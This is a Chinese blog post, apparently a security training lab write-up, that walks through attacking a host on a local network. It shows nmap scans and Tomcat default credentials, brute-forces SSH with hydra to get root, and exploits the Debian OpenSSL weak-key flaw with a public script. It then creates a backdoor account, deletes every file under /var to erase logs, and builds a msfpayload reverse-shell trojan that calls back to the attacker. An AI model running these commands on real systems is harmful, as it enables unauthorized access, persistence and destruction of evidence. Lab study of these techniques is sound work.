zoukankan      html  css  js  c++  java
  • 局域网攻击演示(网安实训第五天)

    局域网攻击演示

    (1)信息收集

    1对局域网进行主机发现扫描:

    nmap -sP 192.168.183.0/24

    2确定攻击目标:本机ip地址为129,内网中还存在另一台主机,ip为134,这就是我们的目标,我们对它进一步扫描。

    nmap -sV 192.168.183.134

    通过分析,我们发现:目标主机开启大量可利用端口,ftp、ssh、telnet、smtp、mysql可以进行暴力破解,对方主机也开启了80端口,apache版本为2.2.8,php版本为5.2.4。

    3放大招,使用nessus进行漏洞扫描。

    4在web扫描这里,我发现一些严重漏洞,这一个可以直接登陆进去:


    在这里,我们发现以下信息:

      网址:http://192.168.183.134:8180/manager/html

      用户名:tomcat

      密码:tomcat

      网址:http://192.168.183.134:8180/host-manager/html

      用户名:tomcat

      密码:tomcat

      网址:http://192.168.183.134:8180/manager/status

      用户名:tomcat

      密码:tomcat

    好像发现了新大陆,我们继续寻找可用信息。

    我们发现管理员路径为admin:

    好像没太大用,由于时间比较紧,我们进行下一步。

    (2)漏洞发现

    通过分析上一步的扫描结果,分析得到以下信息:

    找到漏洞编号:

    CVE:  CVE-2009-3099CVE-2009-3548CVE-2010-0557CVE-2010-4094

    继续寻找之前nessus的扫描结果,找到以下内容:

    找到漏洞编号:

    找到漏洞编号,cve-2008-0166

    (3)渗透测试攻击

    1暴力破解

    在扫描期间,我们先用hydra暴力破解试试,说不定运气好呢。

    hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

    最开始使用上面命令,老是出现could not connect to target,查询了发现时因为线程开太多,被对方封了,所以改成1就可以正常运行。

    hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

    Success: 'root':'ubuntu' 还是root权限,接下来,直接用xshell连接就好了。

    (5)创建账户

    Useradd hack

    Passwd hack

    123

    123

    (6)清除日志文件

    find   /var   -type   f  -exec   rm   -v   {}   ;

    通过暴力破解,我们已经获得对方shell,这样好像有点简单。我想继续根据之前获取的信息进行攻击。

    2漏洞攻击

    Msfconsole搜索,发现并没有:

    找到cve官网关于本漏洞的说明:

    直接下载利用说明:

    根据文档内容进行操作:

    首先下载密钥文件:

    上传到bt5并解压:

    使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件:

    我们随表找一个,我这里使用python脚本。

    find / -name 5720.py

    进入/pentest/exploits/exploitdb/platforms/linux/remote/,并执行破解:

    python 5720.py /root/rsa/2048192.168.183.134 root

    结果如下:

    执行:

    ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

    成功获取对方shell。

    (4)植入木马

    生成木马:

    msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

    将木马上传至目标主机:

    在攻击机中开启服务端:

    如果目标机不小心运行了木马文件,攻击机即可获得反弹shell。

  • 相关阅读:
    对象中属性 加锁 用:volatile 关键词修饰 而 不用 synchronized 加锁
    利用URL重写实现参数目录化
    外部联接
    快速获取表的记录数
    SQL SEVER 元年是1900年
    SQL SERVER的浮点数类型及与C#的对应关系
    接口中包含抽象类demo
    接口的实际应用demo
    多态demo2
    抽象类的实际应用demo
  • 原文地址:https://www.cnblogs.com/sctb/p/11919648.html
Copyright © 2011-2022 走看看